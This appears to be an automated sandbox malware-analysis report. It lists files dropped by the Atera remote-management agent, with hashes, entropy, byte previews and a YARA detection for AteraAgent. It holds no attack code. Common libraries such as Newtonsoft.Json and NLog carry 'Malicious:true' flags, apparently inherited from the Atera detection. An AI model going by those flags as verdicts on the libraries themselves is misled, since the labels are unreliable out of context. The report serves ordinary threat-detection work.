                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ........@.. ....................... ......o7....`.................................X...O.......L...............0(..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B........................H........K..|v...........................................................0..........s....(......%.-..( ...+..(!...}\.........s....s......o...+o.....=.r...p(.....(....(.....(....o....r?..p(.....(.......,..o ....*.......4..A.3......4.@t.......0..8.......(!...("...(!...(#...($...(!...o%...($...(!...o&.....&..*........44........('...*..{....*..{....*..{....*..{....*..{....*..('.....}......}.......}.......}......}....*......s....*......s....*......s....*......s....*V.('.....}.....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2010
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.013965898836397
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:3rrb7O7Rgdp+1/gYoSagFsg+w3Sg+Cag+XgjdgDt:7rne4wCNj
                                                                                                                                                                                                                                                                                                                                  MD5:0B17B3BE9B3A6F6879998D280941DE55
                                                                                                                                                                                                                                                                                                                                  SHA1:EDE825B51EE11AF7C9221DCE596BB969CD068529
                                                                                                                                                                                                                                                                                                                                  SHA-256:1D69336E421C535CECF2E0326BE39B44EEC8EA39754AC8E855D8E0368E0F4619
                                                                                                                                                                                                                                                                                                                                  SHA-512:06D9CC03B8F7295A6E02376159EA96A83CAED4B584769370C0BF365B25D29C883BA5C8359CFEB7316D13C93B49FD37CCA267F6E7931220CED71435E1F4B639C8
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.14.0.17971" newVersion="2.14.0.17971" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <d

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhUnn:Wu
                                                                                                                                                                                                                                                                                                                                  MD5:5EDA46A55C61B07029E7202F8CF1781C
                                                                                                                                                                                                                                                                                                                                  SHA1:862EE76FC1E20A9CC7BC1920309AA67DE42F22D0
                                                                                                                                                                                                                                                                                                                                  SHA-256:12BF7EB46CB4CB90FAE054C798B8FD527F42A5EFC8D7833BB4F68414E2383442
                                                                                                                                                                                                                                                                                                                                  SHA-512:4CF17D20064BE9475E45D5F46B4A3400CDB8180E5E375ECAC8145D18B34C8FCA24432A06AEEC937F5BEDC7C176F4EE29F4978530BE20EDBD7FED38966FE989D6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=1.6

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):93232
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.195903304850222
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:zSvbne0Q41qJ3n8JMW+0KcBLQhZV5M+5Nn0komH7yAfRS7Hx9:zS8UMW+BV5M+5Nn0kom/RS3
                                                                                                                                                                                                                                                                                                                                  MD5:B969BFF44179BF8A3584EEB9E026CAE1
                                                                                                                                                                                                                                                                                                                                  SHA1:DBA7A528F51870B89AED549E81EF0660F43B2943
                                                                                                                                                                                                                                                                                                                                  SHA-256:5EE05D3796AB12ECF7F2D32D48D41D2A2A3FD257AD8456A0EBD5E6019492ECF1
                                                                                                                                                                                                                                                                                                                                  SHA-512:F0643905258D2C09CA0A6C30A0A9AD5AD2FE184A65B7FFA5B7B731FEE8357672B35246626A10B39DF7C18EF1B75328192495685DDF9CD2F524E913D6A2993E18
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.........." ..0..:..........^X... ...`....... ....................................`..................................X..O....`..8............D..0(...........V............................................... ............... ..H............text...d8... ...:.................. ..`.rsrc...8....`.......<..............@..@.reloc...............B..............@..B................@X......H.......|f..X............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tM...r...p((..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.998418289121845
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:6iLY8I1pq2jBTn9kbf0KNGVIYMcoS1JkEX5g7HxlF:/Z0PMcjrgF
                                                                                                                                                                                                                                                                                                                                  MD5:3AB0B86F5D058374AC789F05FB6C6E81
                                                                                                                                                                                                                                                                                                                                  SHA1:4C8142A6EA10F48735429B125ADC278178FA0082
                                                                                                                                                                                                                                                                                                                                  SHA-256:5F773968BD0501D91C4AE1339D248B4F766C39885B35088953AFB1BE6FBCC4E8
                                                                                                                                                                                                                                                                                                                                  SHA-512:1A6CC62361FDD20A99D9551E677269D9D67B6F4B66C09083E07AE5732C23FFE15A5E687437A16A27896A19DECEB9F23D7614B6CC44445C365E3A59DED1AEE6E2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..B..........R`... ........... ..............................P.....`.................................._..O....................L..0(..........(_..8............................................ ............... ..H............text...X@... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B................3`......H........h................................................................(......}......}.......}.......}........o=...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po!...o....*..{....o0...r...p.(....(....o&...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16432
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6559468525212
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:wXh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl55qz:wXh+tYmNyb8E9VF6IYinAM+oCaF5qz
                                                                                                                                                                                                                                                                                                                                  MD5:8E2D0F47E477FAE8132492A31B26F1B3
                                                                                                                                                                                                                                                                                                                                  SHA1:6C3EB7CB1D5E942DC6A62767A701D201E2F69CE1
                                                                                                                                                                                                                                                                                                                                  SHA-256:7C8CD3B61286AAC09534541EDBFF10618938236830167581BD3E922CA55A1456
                                                                                                                                                                                                                                                                                                                                  SHA-512:B40EA70361F5AFCCB3DC41D38A4F302AEE00B9AAC206AD2DFBD1591A7722AF732BC820C3C66EA3BC0816D4C98E364D1345077EDC786ED19135659AC91E0CFC06
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T............." ..0.............v,... ...@....... ....................................@.................................",..O....@..(...............0(...`......H+..8............................................ ............... ..H............text...|.... ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B................V,......H........ ..d...........................................................&...(....*6.r...p.(....*..(....*..(....*"..(....*. ....*.r-..p*..(....*"..(....*. ....*.r...p*..(....*"..(....*. .*..*.r...p*. ....*.rN..p*..(....*.BSJB............v2.0.50727......l.......#~......<...#Strings....D...$...#US.h.......#GUID...x.......#Blob...........G..........3......................................................................f.....F...........n.................M...........2...........Z.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.ModelsV3.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):75312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.23943595769723
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:Tu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYH:KF+qo7mDEwj4NXLGcfgruFcg7HxRt
                                                                                                                                                                                                                                                                                                                                  MD5:D5B69F2C4F5CB0E7D43D7F6C1C87DC7E
                                                                                                                                                                                                                                                                                                                                  SHA1:98FDA78C049D650E47C17D9072E82D87C1B59E9F
                                                                                                                                                                                                                                                                                                                                  SHA-256:6C1325D183C7CC3E516628921005F18BB5A191B0029AF93DFB022CA4C2ABBAE9
                                                                                                                                                                                                                                                                                                                                  SHA-512:D95C5CD5E9DAC57FA9C5DE8645F637363A5E787A8C521B09BFBEA56D01765F4FC31E4080BDCAD28BBD90FDB9BEE1CAB50E95FF13CFAC728405D87C3EFE3A387B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6............" ..0.............F.... ... ....... .......................`.......w....`.....................................O.... ..................0(...@..........T............................................ ............... ..H............text...L.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................%.......H.......t<..`.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*...0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):52272
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.4113040933608225
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:TQMnML8f1VNPa7fb8LRaIzlRK/usybUjuUY0vZKE8tcqPqZw+I39Wu1FEpYinAMU:T9ML8LW/usybGYVE8mZw+89Wu1e7Hxav
                                                                                                                                                                                                                                                                                                                                  MD5:94B12931B9032E80157DC27422393FEC
                                                                                                                                                                                                                                                                                                                                  SHA1:2B762FCA27538B55ACF736F7D65E293E5F15EAEA
                                                                                                                                                                                                                                                                                                                                  SHA-256:746AD9902D9310CC2F172736AC156018ECD3843BA58C8337DE017074B06CD645
                                                                                                                                                                                                                                                                                                                                  SHA-512:D943A39FDD74627514818DAF3434BD1ABEB4EE10077E8B10414098DDA2972851795A15CBD4CAD73A67D5171446E4A6D844CDF8BD705E72F34B7DA16678097BE9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&............." ..0.................. ........... ...................................`.................................>...O.......4...............0(..........t...T............................................ ............... ..H............text........ ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................r.......H........E...s...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....P.........io ...&..i.X.P..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....P......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):398896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1343664856235245
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:5jS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvM:5+e55LgIkTmyAAfTnMLvM
                                                                                                                                                                                                                                                                                                                                  MD5:FACA1B5218F8EB76963366A6842E122D
                                                                                                                                                                                                                                                                                                                                  SHA1:41B281ABA7D7FE994EE6C77F7F71042885919EC0
                                                                                                                                                                                                                                                                                                                                  SHA-256:D779F3514666734455B5B2B7AEB035F7E1D7394CD445E332DD4D236E24D5C94E
                                                                                                                                                                                                                                                                                                                                  SHA-512:8F350CB3D0C13A701C67749E103B1E07EE1E2EF8EFE71B70CC728F8E21DC02922BAB241CA256695DAC9B225D450623E9F8DA055EA062E336D7F1CD9D2A3FB6D9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`............`.................................v...O.... ..................0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\NLog.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1409
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.992215339808616
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2dNQjY8L2PRRkMYaWcvJ9AwcPGnJg8vQpyriEWZoEs4h:cb8MRRkMVB9AwVbIQdsoEf
                                                                                                                                                                                                                                                                                                                                  MD5:766E089F9AF0DAD5BFD8B77167D1E0FD
                                                                                                                                                                                                                                                                                                                                  SHA1:0AD55E6BA596EFEB24867DC9FDCE4B3D2F2D904F
                                                                                                                                                                                                                                                                                                                                  SHA-256:1D95ED644BB7D706E5B8EBDCB875B23F8B21C62C53C701EB8B3385F770808D7E
                                                                                                                                                                                                                                                                                                                                  SHA-512:FD8ECF32094577A51579911AC3722D839A7B0874146B909EB8DC944CDB5DA459BFCF7EB64B47EC08F40515E6C38B4C4CBA1F4D9F9EB403E891A8710310DBAECA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8" ?>..<nlog xmlns="http://www.nlog-project.org/schemas/NLog.xsd".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. xsi:schemaLocation="http://www.nlog-project.org/schemas/NLog.xsd NLog.xsd".. autoReload="true".. throwExceptions="false".. internalLogLevel="Off" internalLogFile="c:\temp\nlog-internal.log">.... optional, add some variables.. https://github.com/nlog/NLog/wiki/Configuration-file#variables.. -->.. <variable name="myvar" value="myvalue"/>.... .. See https://github.com/nlog/nlog/wiki/Configuration-file.. for information on customizing logging rules and outputs... -->.. <targets>.... .. add your targets here.. See https://github.com/nlog/NLog/wiki/Targets for possible targets... See https://github.com/nlog/NLog/wiki/Layout-Renderers for the possible layout renderers... -->.... .. Write events to a file with the date in the filename... <target xsi:type="File" na

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\NLog.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):883760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.071504659955744
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:V1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQJ:V1n1p9LdRN39aQZUqM
                                                                                                                                                                                                                                                                                                                                  MD5:17A183A03C34B8EC1C91B3DD0B50E022
                                                                                                                                                                                                                                                                                                                                  SHA1:7D226520BE51BD71D05D7EB56793233794F87DA4
                                                                                                                                                                                                                                                                                                                                  SHA-256:381278035C5A8A4668D31B12F0BF3DEC6544E9668FED84DA038A8D21D233D72D
                                                                                                                                                                                                                                                                                                                                  SHA-512:AD5591F6B90A07C00F10EF19231BB3C766E9E27C2205AB3A32C15B7D0DE0F732A5600665E4302290C771F06370B23E4FF0AC63E51C1F36899F98CCB6BD5F8C01
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ...............................;....`..................................c..O....................T..0(.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960370699367048
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:hBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUW:hBA/ZTvQD0XY0AJBSjRlXP36RMGj
                                                                                                                                                                                                                                                                                                                                  MD5:53D8AD0BCDED36C2EEBD4D3C45A60BD7
                                                                                                                                                                                                                                                                                                                                  SHA1:9289840CB0518AF183BB41AB05428A6415B92AAE
                                                                                                                                                                                                                                                                                                                                  SHA-256:07A068EF96EE5F447282B42B1818FDFC372B674893E6742A5F83DDBC4DF13ACD
                                                                                                                                                                                                                                                                                                                                  SHA-512:41B19112B6CCE405E16153354223F4AFF548E9F55EDFDC158588E78D9EAA755E10865D7220B916EC14DAB4181C55C005B161B44AC011419EE85EFF5F65975523
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):284208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.11766612253341
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:IZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHex:Ogo0WPVTXgk
                                                                                                                                                                                                                                                                                                                                  MD5:D1BA01295CAEFA1F00261AAA943FFDBC
                                                                                                                                                                                                                                                                                                                                  SHA1:54BE9D6F121721542E1B563804766592C9EBF14E
                                                                                                                                                                                                                                                                                                                                  SHA-256:F425945B4D1BD5D65776EE4FF4330F33947692EA5E797EDA3103B6E380196BAF
                                                                                                                                                                                                                                                                                                                                  SHA-512:DFFE1F15F635FD9C083B51C66DBE5C5C9B16516B8CA036B262765279FBF01FC521D10AE31288CA3FB5DAD4F8B6E744DDA33FB8698267C40970DCA9409178E067
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ....................................`..................................B..O....`..D...............0(...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22064
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.678784612747097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:ty/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqpx:tuhMaVmzDC67EpYinAMxCJ
                                                                                                                                                                                                                                                                                                                                  MD5:35082EAB5825C9A9D021B5B97BE382B2
